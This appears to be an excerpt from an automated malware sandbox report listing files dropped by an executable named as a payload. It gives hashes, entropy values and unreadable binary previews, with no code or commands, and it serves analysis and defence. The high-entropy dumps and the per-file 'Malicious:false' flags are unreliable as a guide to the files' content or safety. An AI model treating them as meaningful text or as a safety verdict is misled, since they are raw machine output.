                                                                                                Preview:........i..06 R..:...l.r..5.\..W.....=..2b..d..!.. ..EN......'W.....R.WKQ.J...d..f.X....~...N.EV..j.U.2......nY2...|.d./.w`_...S.x.C....._.>m.!O...cu=.6..w.{.bs}...}lNJ,..<.d..T'K{/r39......8...d.-......m..^&.24....b.55..(..]....1hD...8...H.ef0..K.?...D..Z... .T+...80|.o...i...M...Y#.........d...........?J......_......x.....x.l.}.H.re...\.....Hb.O_L..R.y6.%.......~.....G....s.Io......yQ....v....5).e........3.L.......d#T.z%p;O..]...,V..n.F=...L..&....K..Z...>.....m....[=..mc.F}.@@_.}5Z.^*n=..f..a.^.....i....r~.......\.D..?C..B.q!.C..;6.o.1......Nd._.c9.."..+O.}../...Y<.<z..e.M.9.[1..[F.....9....5..+...P....D.A..l..-..........|y:.R....aX.......I.%`.h..k.[...cOi.mqH..d..*).....`S..pa.#&....,.{X ...k>R....t.?.L^J.......%i.....p?|}2.F...nn|.....=..a..-?..1G:m.\0....`nR2.6...e...C.1.......`.I......[+.60....h+..X,n.v........Byf.l.:^.'...~..p...@.T......U?.....X....(.e...G4..O.#.....H..m.#%....O.ig/..q`..H..O..}..c.dm.45..!.....,...r.Z.$..(3..S..o..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):8526
                                                                                                Entropy (8bit):7.978344256071849
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:t/quP+jfhY2AVbuV814tqz0mC6uyNppoBabQAbJuC+:tyuP+dY2SuV814Mz02uyjpoBabQAbJub
                                                                                                MD5:4F72FBA680315DB18AB3089E9F2376E9
                                                                                                SHA1:2B267D144105069E729229D16E84F0C255A08CAD
                                                                                                SHA-256:B686B8EADC390892D49CF914D16233104CB258A46F1C17C51682264B1D6D7573
                                                                                                SHA-512:86C90558CB362D3A144BA48C91B02BDE79AE01079F44B927EDE584FD97593ACDD32D272FD387CB4615FB2148C58675A34186CF7170DF1C205D39CA67453555CF
                                                                                                Malicious:false
                                                                                                Preview:regf.........P.gtk,'3..N..Y..E...e..B..D.......K.>}.]..=.......LtUP.X.!..Vj....T.bFc....e.7........>&F...0Z*.2..b.(Z.b.^.!S../.5W$....jO@Zm.rXlb..........9#.CP....I...Os....f.7...A.&kw..e5......~.A....ZN.e^C3..2...P...$.'~5....&8..*HS...i.}LB...8jf1n.Iy....L...O...-......C.#-y.Y....0...O.. 2..........c....5..H.&oH.~g..&W....W>......p......T.uv.`......k.B.).H..w...M]gB....L.3..6`.....}.>...L.@jj..~..g..b..RH.!.u..j.(.>.Z [..'bBFl..0..u.1<..q...h..&...v<..vE|d.E.............&r...Q..8##^...w..W.i<..o|.[...5.S.^tq.Tu..t..vx....S.S.|..a.'.H..,.V...6.'f.~+.Ep.P.Y1f.#...C......WZW2....C.lm..2{<.u..p..&.t.+.c..#...M..........>.....i....M....,l....|<..c...u..K...E...m8.}.{.s.UTou...Y.8...$.T.J.\i=.GK+.v..e.'iz..4....v..`D.A.E*..o..s......(Ky.....wM.........i..y..ux<.e..TTb"D.=.-!l.$t..Z..m.t|.....yEM.L...w..-.9g....U..K....JF..C.2.nV.|nL..Q...YSQ....\..g..8..;\.I).sw...47l7x.r...S..8"V.ls"..d~/....i..^..~v.irs.;.`.09r.M...+.."....b;"G.A
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):8526
                                                                                                Entropy (8bit):7.977270342912165
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:Jeov5GINaqN7n9erd6V3U6SDBOmBovW7D2acOlI2KQqItYX6tp:J/8ILdSd6NU34mBova/9lu6tp
                                                                                                MD5:02AFE7F4FEF57FEBB6DBFF19AB4E0013
                                                                                                SHA1:DD83CA1099A065BCD33CEE2F1EFE2C98D131E6DA
                                                                                                SHA-256:73F9B3591913387A40DA3889011ED698868B59EAD0406EEE4326A6CB7A0BED2E
                                                                                                SHA-512:033746216630E14957F935458531C2D44C443EE774B3DF9F6BC7C829676D8F8AEF629988E84458D03269AA772C1E7669BC9E3AD3A615C16DDC77457EDAC91501
                                                                                                Malicious:false
                                                                                                Preview:regf..../.-.A...A<.a C..~..lx..A.....9&.p".W... ......9.....)...<..y';5.\...n...}.gW!.ys..i.c....Z8?..1..#.....yv.E.&...P.cg......_..6.V.iT..{...,........x.~.q...].....7.*...-.p.u..MM.Kjg.90..+.g>..<W...<]J.1..*jG....:.kr..4^....je...=....eY.........D.I.2..j......f..2..$.GB.....v...0..r...9.u...4IQdO..zv{.m.b....6#s3...2....L.....*...M.P.4o.....!./'..3_.....w....C..a..{.......H.._..Ei...@.$A.)I.0M..*r......<3.p|..T.N..X.$*...F...z..Pi2.X|.$.2....l.....4..8}.s..g. ....q.$0...p.Nr.Z.1..Q.U....g.(.@..qy8R@..N._c.8...;F...._?.......N..C.v..l.....t.d..?*-.kQ....n.>.I..%@kA.9.w.~O._2R.>U....8....an.._.=e..%.<h......![+mo..I....x..Bdo.VJ.cg.D.j.s..W......s.....B.0...(.n.......D.....v."O%.9...F.AU..~..ek68e...........=.'...f.z"D..8.T.+.-.0a...6...........y6>.F.....]..Z<Q.RnV\.......mf`.)iq .t..(.e.X.+...... ^......q... .A....d..C.K-..r/....c.W...!.A...|N`..z..Ed.:.....VK.2F?....h|.J@Y..|z..}..lAOe..{..yVH.EnS."fF.W.*c..Rc.y.....F
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):8526
                                                                                                Entropy (8bit):7.97646593530174
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:9E6eE3FllhemDGq2Gh+zL4lbMlucniC16OOmflt5D5fSX:9feE3blhePZebMc1yf5DI
                                                                                                MD5:4B53D0315D3B6C38AFC796D3D8F088AC
                                                                                                SHA1:D5500B652D256180CBAC7815D6FBAFC190C6568F
                                                                                                SHA-256:EE250FDC70583AF8E4B21876550CCE86E4E8AE802A78DD80C27CA1260172F4D2
                                                                                                SHA-512:DFAD695E40FFAF80EF2186131EA206DC2873D3F34B91BD7E2D7026737C54FDA31C72C6C83208CCE537F4B19F257AC08A276C457AE5FB9C381F99FC849BADEEA3
                                                                                                Malicious:false
                                                                                                Preview:regf....._....|.......G8......L.54..L.y.c....B..c.Er...!Hk[...^...~.oef......;.....jM....R.=;5{..Rb.e.p.B..>.....dY.,..A..u`.0y...;.z............2.M...=W.g...d.s.....Jz...........<.....Z..\@z..u.#...akdF..QMy.....v.b....X....87..Z.....ya..Le!........j@U...._o.B^..1.6.!8-0.Q....G...Z7L.E`.{.nCa..O.[.l.4n...-.7-x.{f.A.5.....y.N|.q..z.#..U.94...z..!....>...+h.".v.{\.a>.@..L.}..ke..].f./*S.A.(.......03o.B.y.(..Ad..e]_...f.gZ..O"R~_Fd.R<}g!........un@..^u....6......Y...-.. .K.S.)...i....X6RC..`LI..'....lG..l..~...:...R...fS........._..O....s<.o....F...!..W..>.G.......UW,..K....{?..8w..8.^X.....gf......vtb..t..Z..\.....#....[l..-~.U.9...B..-...B.........d.9>z..kQ\......5./..h....o.m......x2....*%g...y..0y...b..2{.._2b..a..=.6}....G.6..*....XM..F.U.o...w.&9.z..VDu..../.=..$o..d.M..FS.g.....G...1.]..H...)..C..%:).1..G......c>l._.q...%..W0.......*F..'N.F..6...O.g.G.\>X...=4..q......sC6..!..Z-..xE...B..........dY......_...zb...O(.4h.....Ne..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):8526
                                                                                                Entropy (8bit):7.979941234227792
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:irvHvuRSeHxYc3jupEvz05K6n6XYpuasD637jj+fv2P:irPGR6cTupaY5K66lasDIjj+fvK
                                                                                                MD5:1CBEFA9984074A1FCD48CC94D0C8D6D9
                                                                                                SHA1:4FE1224CB2D513D2A76FF19C00C0ECC861E680D3
                                                                                                SHA-256:7269A0D0FE41679D34077DFF41C0140B8C53C77A036063312FC242481F7F932E
                                                                                                SHA-512:FAA018466A5C2153408DCE3AF67B49AC66EEF19FD8837C09E66F4B6284EFFE76C6A939C6B28C2B6D9FF3F11AD669EC8F00618475F3281351C0F6EE14FABDB072
                                                                                                Malicious:false
                                                                                                Preview:regf..".,.;.U.@+7...H.Z...\BV.9..v..^..e ...V..R.eE<....{.....5.\C..+-o....4......{..........B.S.r#<+8...........?.7PHK+J..L..X......Fo...Y8.0..d...-..]D.8..V.p...a..[@..=........j..._*a....,......vgDj43....u.Mg.0on........-.'...6..=;.....S2..+g.5.YCZy.55....K...G..B.p<..+...Q..._.5....z.3-!..^om.i.8.d4rX.b.l.9.7d..7K...C.v#.^... N....p..WX67...y2.iK.k.G...0(.z....:rt..]...'..f...>.*.......C@......*..*...5Ej..J.n."..}[.Sy..2s..hp\a.C.....Z.O@.>.T..'..9.r.)..upU-#....T..3=.y..~..L..,..*..t$n..%G.. UIk6...E/.,..g..F.7V&.o.[EH..Q...%dwR..@xt.y..rR.*t&.&..i....^....".h.P.K.......b..!..Dh.N.J.c.S..W.8.!~i...............h..}...........R..=..O0;..,r..y.].&.3...Lb..c..0-..E..{cb...A..v._bXdO....k..4.....#V..U4...{.o0..5<q.....3.<......0"{..._.rC.........>l....7...\L;.XV.#G/..@rh...=x'..]...f....d*..I;x.......%...~....b.....s....1G.X....o.>H~.....h..^N4U..l......x-=..;a......R|.8{ls..".+..M9...["....H...WX.Y!.K.|H-/..;.Q.K.....^v.A......C.$
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                Category:dropped
                                                                                                Size (bytes):8526
                                                                                                Entropy (8bit):7.979227916839755
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:xF894gicrdZ23ShMbOpbMGj4oHg9xclDFeHZHs/0Qxq0N:YSgiudZwvipxj4oMoDF8ZHnmZ
                                                                                                MD5:34D15FE60F7B898F4EE966E9A7D4B6A5
                                                                                                SHA1:12C59CDD6EE1AAE5702C0D03958A3E16247F1760
                                                                                                SHA-256:F2F9DB52222BF66AF4C56B80AFD7F7472E27A50CE3856AB326AEA7B872E7126F
                                                                                                SHA-512:A29E169843AD633B75BF6DB09E5129CB143D56174DA6F47954A29DCD5AFCDC165113631258C1BD33B11B462ADE3097591FB4028E39685D680F1A630B8A0E1C1A
                                                                                                Malicious:false
                                                                                                Preview:regf.........a...%.PV./.+....f.r.d.>.}~........4 .p....ag.\..c.&.7xxT.`/..'3j-&....,...''VfT..>.{i...n....k@.H......Xs.[u`......g.......n.N".Yuizd.Q)...i....xT.J..G7p.l.j...v..X~.. ./.jn^.WBgO2p.E.t.B.+w..Bf7....Zr..n.?6;p...6h.7.%\].Ky.R.y.P'.<...e...R.P...m..^..9..M.N....+tR......{?..".f....0.aSF..N#..........rx.._.).0..}MBEA...k.v.^{....66....*.c.mj.%.\@...U........U....z.*q:u.|e.....m..N.2...p..c.0..?!.Q@.......Nl7..l...{i4}..}C.%D..,..po..xMg......bK..]S.E..`F}.............1r.s...3.*.U..S.L4....FVC..L0.T........b..;...3...0.[.....{..RL..u..%9.[.*...6."........Ph.......K).E.........r.....\...DV..j..1..K..&.. ..>...!.v....)n<.`1im)..q..Z.n#v/1..G8..Ou...]y....?}......kI...D.S......s.o...H.]...W..?.....yv\.W..F.....U3...H....D.\..`._i....X....F.3.RZu.Z.....43..#..hP.3.V....E..:z7...'......w.!xOMB.g....r.H....B&.VP.b...N.U.\......-X.m...knk.;HY...;@.....{l...n.....Q.z.hd....6....$.in.. <X... .><sK...F...yX......)o..]=a..x..}..BT......>=.r].....3..4
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1573198
                                                                                                Entropy (8bit):1.3305255499717987
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:a5B9QRGNaKIMof+Jn9B8ysrr/ZEz1g99IDbE1ffZ+HkVzhdU2aaJ0ak:aCGNgrW0JEz1g0bE1fcHEzhdUT
                                                                                                MD5:88339E8DEBDECDBCB7B1C9917FB7865D
                                                                                                SHA1:AAB30232F255DA5DC2C140B5CE9B5164514BE74C
                                                                                                SHA-256:E44F75B2F98A7B1FB2F8A9EDD07DA5C9A53CEAAC77E97A511FE97BAF057FB362
                                                                                                SHA-512:3594A97E92286104B707F68C8BF2FD9BFB58738A42D69598E294BE746C92C68798058E6DF43B7C636C82AE6093BD5BB5EA86AED55D9CDBFFF63526DCF41A4E4D
                                                                                                Malicious:false
                                                                                                Preview:..4t.(4:z.b=...."!..i..t.....`..&.h..|t.D..MN.&%.B.~..d....R.....#..&P.*R...xs.?C7k.s....\+...g..`..I.V.>6...a&s...........;.pt.4X.....C.^"..r.HD..z..q.+..3........"..d.......P..\.'.qkP..{.O.P.{....a..8..LJ7A.....Q%....?.b......_..s7<.n[.F...\L.q.NI.P.;.S<@z.3...0.8l..........y.Z..u.zY...WI....F?.f.....<fN..hc..{b......Zd...2z...!.$/O..i....j.Z./...Z..NY.E.w.........9.....ps.%k..../Z.. S...p>......}.1...e...i0.4.PT.*..q....q3.QE.^F.f$..}...*S......q.k.^.N.:n........._....ND.n.J.}.:.Q3"..z..e\$i....m...C.X..f.....b.x..#..v...7.e1'..}.....y..FV.P..3..J..."2..32...3?H...'./..ExQ.GJ..M../.......^...*..,-........f.C...-\S..5PgT.U.q. .o-.7#/A.n%':A.T......S ......2C%2....(.9~9%.....&..B3I.m.%>&|.._F.L.%..CX1G..T$....z.:...M./...../.....D@.Pc.t..M.....o..&)..p.#...+i{r.....;)|v.C...^..Z.dX.v.$....:.../Me.........c..z...d............/m..C.#...e?.X...(.J:..<.3..|.0Ogf....Z..7..mO..$.KI..*yjveo.).E....|..1s...&..w.v...{.]..~.5qMftj.d..X2a)..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):16718
                                                                                                Entropy (8bit):7.987838163211378
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:er9Wcy93JBN7XedRzWbrSrcvwwJgTv3BX8ibPGmC9rVPTm2:CW7BNSpWo3wJgtsiTDCbT3
                                                                                                MD5:57940440325FAD42B824C9EDCAAE3652
                                                                                                SHA1:22822E3B2B160C271C0D0FF9A71706CB066B5DFE
                                                                                                SHA-256:116517B992156568FD58DF06339D8C599C377ED01B4DCBA45F5B94567A1CFA93
                                                                                                SHA-512:AD374BFD923FCCA3007DA8B29B469B4D0298D45834422EB1B257D92534F24DCC62FB52363052B303CFF3C7D27A42427967868F0433E0C0FB019F0E1CED7BE27D
                                                                                                Malicious:false
                                                                                                Preview:..}....>...{c......._%P..F.9.Y.J..X.?...%..q_.l...s...w4SoP.U...m.Ge/....L..3...i../.<[}.o...-....m;w.>`1....HY..'/......3.>.&6E...........v....M....^..7.8..Z.........].....*..P.>3...0.a^..T....l|.!=.......XW...E.4+.3....Ak..@.ZI.Y(...r...H...$YAHDq(./8r..G;.Y...Z:iQ[..g...{..r..n.<SV..v.....1?K./..$# I0F..N$....u..9....+D]Q...."/.g<.pL....eA..^.=B...S...@V.'T....5..S?.)....4..Q..n......P...m...[q.G..b...!..~..D.t1Pl..33.._=#B....."...z2....1j....U.....o..B...?u..<......p....c.$..*9......6..6N.3...*.9..YZ.*...j..T..J.n..o.A<..W.d..+.qt.pL.%U.CG9.a..M.......-0.8+(3?. 0...V/.H..z.n.g./(y<..'Y...c\........P.D.X..z..o..(X.8.`..2..^.$..+.....,..5..5....j1.dF..aa.s......$....._...Z..../...C...)s.S.ui.l.>$+x.c..m....5d.V...K.!....^.h..J.....S&j..Q.\..=.5.]r..4?~..M.4...E.8.Z...X*.;.#5........Kq..$.=..'...wq..D...s.UX.W...."..o~/u.7...S...2...(+k.121...#..,...riw...Kw.xk?./?c..1t.#..5u..&.y.2.$....J..0.iuQ.,M.p&..&..[....q...#..d4Z..v
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1726
                                                                                                Entropy (8bit):7.883676881474198
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bPHfW1XBI2hJaUcjuBdE2oIWmUY+/oYKNsLEXN77mIGk5x3bD:DW1XBtmUcm0rL8NsLE4GLD
                                                                                                MD5:D3A8F7C5217A58288130FC8DE23E5E36
                                                                                                SHA1:5A6E27BEFB65E3AB2F0673B0BCEC94C19BC5ECB1
                                                                                                SHA-256:FFCDF1C7BADC94856336B03B8EDA1F742E2E1247FB1C93C4F8E93E0C86A92372
                                                                                                SHA-512:723F6B459AECC3D18681EE5F20025802933EB90D09407A1837421D1A40F195FFA6BFC54D238001082E233D138658C24A5B2C7E523816AD7EC4C0B47A39401B8C
                                                                                                Malicious:false
                                                                                                Preview:h.t.to.X.R.TM.H.F.p,.." .k^/.....V"..C..]7Rk.....s.d...d.'...f&b.....,.f..0....;c."a..GAw.a...i....p............p5'._.h...k.....Np..z.o..{.a.F.1.R..[:V.)....g....p.;&...P)...V.u.y......."..?..;2.....=..&.C..YA....Y.H..R.-qa...%:.S..J.oP.a..._.....Q0....#.I......Hx{z.......)r..OugnvP.....x...P..dA..#N.v.k....O........to\.F%1.z..t../z..}.......u.b.....I?s.E..E%b.W.>.%]j...^......r..K.~.C.kFU t..8[[..Dy..NCo,.*........-.=...8\.$%,.........9..&6v...#=.Z.X..v....!..L...0........0. ^.....y.........(Zm.=V..g..B....d.V. .E.S.......-..e$.H.:,....6..$.'.vk.&....n{i.a..H.RX=.k.\.....VRL..Q....3.MHY....p.t.......$..8e.U...#..!.*.C.....q..,.|.?...N...#..l.q.....>.^.[....3..^dg.k.5..4...wb....(.6i.....E.!6.3...<Zu".. s.I%....:...[U..'.m.'..2T@..y.*..x2%w6...fTS...+iM..p-mRA.P......`2....Q.....H.i../..n.....>=.85....3.*..!bn.d.\.-.J.1..Y..!..')bM|..1u..X2R.'.K.s..X.....z..Kti.....#.../.b..0./:.....R..p.....M...0....n...y.B8='W...............y{f.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1092
                                                                                                Entropy (8bit):7.806551994843493
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bwZCoFRymjdg9AChLwGM/fQBWsMsh8pTn6hrmyhfoF+N/r+sEXsNx3bD:JofyedghLwGMABrMsqhn6Ay0bXsnLD
                                                                                                MD5:B58BD6373F5F794DA18B3BE9E914C9AA
                                                                                                SHA1:E44E25ECC1690E5114CD07E28495CC8A4E95A520
                                                                                                SHA-256:4AF099977CD96772721AA2877F4D77A203C91F43DA246F20EE835A7057E6728B
                                                                                                SHA-512:BB81DA3631F8EC035A2A798CE118F87B6E74C760629F1C13FF37AF26093E87062F1970CA9D086622C173F668F0D9C65013904DBEC54922155D127B19ACA1E87C
                                                                                                Malicious:false
                                                                                                Preview:.....m.@%..,./..ah.X..KD.......e.../.IO"....P...hz.;.....+.k.?..M>l....\...E..6.%..zc..Y!.].x......I.T{...A*..4....hWL..c9.W.p.f.{.......=1...gg..m......K1....M.W.....!P...MG+X.`>.Av......W.[y.......?....?...`w.X.>..M.7a.RJ.M.DL...|o(G,.I..G..!..C.....\#[..;..O<......p...&.(..N@.@-..).....!..6O......$.T2{-....x..k].:..../,...i..V..<..,.G<..D1...he.%..]iy.z..Fr~...I....d.<&.[^-b...#..H..E~.......G.O..._.re.hS_..<m..o..V....N.i.....yw...s.3J.#6k~...784.S...J.s..6[.....p.e........."........\f.&mFnX.<.?u..0..4.Y..zR......(8w..QA..M.G...B..............~J.}.x.J.z.W..U.......H........g......../.....P...n.l.H.....Q.........t...+=..o|A.*.\....d.fX./....Y...~Zp.=%.{..L.T.Q.l..{M.2.).Ha..%}CBz.nAQ.Y.T~h.)...........=9MY....Nf&.^p.AB.9U...y..3.S.8../v...Q(.;&...[e.+1.A#...(l...J.[B:.....{.U.L...._k..(...~........9..>.......`.....D/C..]..s.$...."......M....(.J.4...... d%X..{V.vi.4#h^^Z......d.AK...."......5.7.G.9k.d.+......0.Y...}c...z*$._.6#..C
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3084
                                                                                                Entropy (8bit):7.932921723687291
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:ZOq2Et8A31dg0j/AfkyovEzXwimj+R3q2v:ZO0b3Lgu/MYszAZyRzv
                                                                                                MD5:E98280371BA73A3E64F78CADE7E3A5BF
                                                                                                SHA1:C29A040D96D1DFF10947D1853CF6E8106C182721
                                                                                                SHA-256:E3792E8B6E3919D8D8176FF82E0E7AE90595B7E8469E23440E3E5BB4549368CB
                                                                                                SHA-512:CE4741A6B69D1B2FDB69A11AE5CC44D21EDB00709348427401F7A9ACDA1F2F8BB6B905EDF1DF7810A60EA4A314CFC1E588D063D98B51F79F28A88469B170D2F1
                                                                                                Malicious:false
                                                                                                Preview:{.".T...,..........ro...(......\......8jg.&.."j.A...r..p]c........-.w......C..!v..-..o..o...!...]....!.>9....G=...A......BbG.~b.....a....../......B....,.k....'w..EW....7u..K.f..9.|Q...!r........k/.....um...v..w)..yu...tu..T.3.,....[....G..L.L.od.2l....y.....S...D6.....%.:..I(....`.E...r...w..a.ycz...7.O.Or...Z...4....<.Ym..R.N..R....t+.qGG..l..5...I..*Z.wT#.DQ.4...{..5..a$.}LX.]f..F.P.k...c...-.....K.x.r.......j..../.P.Z>...2a.A..|S..}....^~.{.=9..[p;q.M.Y.-.`...+l.V.U.+Ahz...8n.a..]...-~.o:Hs;...u[?.w.?i.J.]..,.6...o...?..=K..z.o.X.GJ..Zi#.f.$.(.g.vu..$1.......L.....'..4.j....f-...v.X......_......m........!<rY...!J...+..)F,C._mg.........Sf...".D.b.]..+^...s...*.).....?.Q......V.iW..%#^..g.1>#m4..2qo(....%.R?.h..w....g<..c..i......q.^..]\..0..gPz..<...R......($}........"Y}}......\..{..jm.tD.7...]...Z..~.:L>.Z~X..vW...;DQ..........[.}H]..L.NX'.d.n.....:.h.|8u.....u9.&..Q.[5).. 8.~..a|...+AkH.\R.a.dt.S......5...5e.y..3c7.k!...7n..w_..}.*..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3018
                                                                                                Entropy (8bit):7.934777678295153
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:a216bY6oPVRWe972BHyX86O33sXe+y0xv+ssLUaSfWkOsMLD:a216ns1Z2BHyX8t3rKdbOJ
                                                                                                MD5:9E07D3BBC6AC30EFD2B5645878D5AE9F
                                                                                                SHA1:AD2BDFC89B9AB5DFAA212B347AA80AAFFB7B81CA
                                                                                                SHA-256:76DFA69CE26A949BCE089AE99B0C3914347A400C09A7AF86347732DB6B2C8F61
                                                                                                SHA-512:F0449B43AB8A2ADF2F7984D4DC8ECFF3B9AC416845308903C129EFFD7C13B8ACE6EA848A8B65AD79A01728E152B60A34E5E9A38D4244C3D8209D5B70CB5C0FC0
                                                                                                Malicious:false
                                                                                                Preview:{.".T9....}..<B........iD~.8.S....f_V...q.....0.}.....1.5.G..LhMU..n...1.y..Z.G...1....6..a.X..n~.6....T.?.[.2.....y.....i|..e.. ....=..h.46.^(...V..O.G.V.....2.._7....D.k.&8..#.gz..I2k"...[.(.._.S.+..9#L.I.F.....U...0)...!..D.MQ..@.....a...[.kCq......'&#2...:.t..#.....Z.....TK.l.^(....M!.t._.|6....b.B...7A.....e.Q../..<n9yRG{5...gIt......M..x..U.....L..5..>9.f.tm.wA1.....F.K..%.#9..V...A.u..(.x..L6'........n.B.<.T.!f.!WV.....>..$H"Y..2.P...s..$T.J.C..!.../s....M.P|W..|]-....1i,wy\.o3...y:.x..}&y.A.ke....m -..\.J..... BM.....j....%;Ce.g.^.j{dh.=...g....p..z.M.s..q&s'..C..M.....c.....Z....?........]..+o.H....8..|...^3r1`J.!......:b^w....q...._T......j3gK.=.n.}.d.NR..A...|.p.rdCb~.J.....H.B..........U.6.UE...,.(6.x#x7../.y%.W.x3..>^.K....!..Ij......=...P...YI.X7._~.M."...D.Y.t.*).V..w..?q...\........lHa@.B`+./..i-......]...5E.F.m\......(l"..0EUZ..~.t...x"..b...E....3..TXPS...R3N......>.. ......Z...u.....q).$...<.......4.]zl60..?.....h..^y...Ms7.*.OS..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1573198
                                                                                                Entropy (8bit):1.3190347547198535
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:q8xmx8r/vntC2pFZxPmi68ZloUzz7NTUhqKWL6t2FdDm2bfvrw2QzjmR7aPaB:q8287o2pDxPmiXPTkPstnw2Q+R1
                                                                                                MD5:59B1E7E15CB8B69B87FA20A27963C18F
                                                                                                SHA1:6084EC72760EB61E0EFF4ECE3004C15A47C0AF20
                                                                                                SHA-256:08D422CE8DAB45A0AEE89D07E321A0CAAF5CB1CF43D72EBD075818A2C8E59905
                                                                                                SHA-512:296004937485F7276FB55147D8274DB6C32052D0982A61F40E103E94A3DFF75A85D1D2455AF075491DE329D8544B9C383AC9E35ACFDD6BBADF8A1A5D0F1B8DC2
                                                                                                Malicious:false
                                                                                                Preview:./...`.&3..V.......C.p...'QF...q.v.\>......T....XDSS..7FNg HpX...?Z.e:..D".{.........P.....~.&.......7o.O.g.+.....} .2&.y#f..9c...M..Vt..%......E....^.H....y(mU...........y.E...?...m..DM..O...{/.0Mn]W..I..a.....9.(...q.c.........*......8.uy'9.#....j'2.G.........zr.C.u...=......du(M.i5...w..q7. 7.6......\..qg..L...`A'3.....{.E$.-.}.......9.p. C..x.TVUi.Hl....j.1zs.....-...=......A..g|.\..R.....?.`.e.{.7c.$.J.......s..0}V.E..J....R....l....S./3.^..AT..7%5......^.I....>.....Ju..i...R.B..;....z..^.q..\..j........8T..,...I..Ku.paF.:.}T....7m..y..q..3.j..G..A..t.y.WkA..rp....t...!.V#c.....le..O.s.x..s...k...F.f.%....h.w\s..@.e[N..Z.B......(..|0.....K..`aV..Z,MUe..u.r..d..P..f.(.V.....l.|j.).[...2.p...p..>...-..t..~..o.|..+b;H.7<.DR4.......Sy..lM.3....S.xi.?.......;..Y..X.(r...r......V....O....^....A....4v..._$.&.hl\a..q.TO.<Q\Y]...;oD......~...O.9....|<...:.N...p..Jw*u....5.>...1q$......s...\.\F..qq....jQ..'..T.H._b'.J=.V.u..@3.i..^.S...-`.gzk.V
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):16718
                                                                                                Entropy (8bit):7.988935849295033
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:IsLb9NpAgt6QTmR0bnf6JXqy4KPe3tlFIWGcl:IYtRTmRCfuqDsa7aXcl
                                                                                                MD5:4AC4D84FDA7343459DC4B99426428642
                                                                                                SHA1:FC981773EFB95B3B20097233B15FD1929BB5E03E
                                                                                                SHA-256:9FEF20AAFD980A338B7A4490FD6A2A5302FF9E719C0BC2B6D75086B94050D9C0
                                                                                                SHA-512:5EAC232C6AF9B36DC3B839E7F03480D20AC103C8D243751CD7904CFE69DC6BDCF6CE169939A531805811B61679FFC1573E7CF7BED507EE04B7D1B99D6A1C0A26
                                                                                                Malicious:false
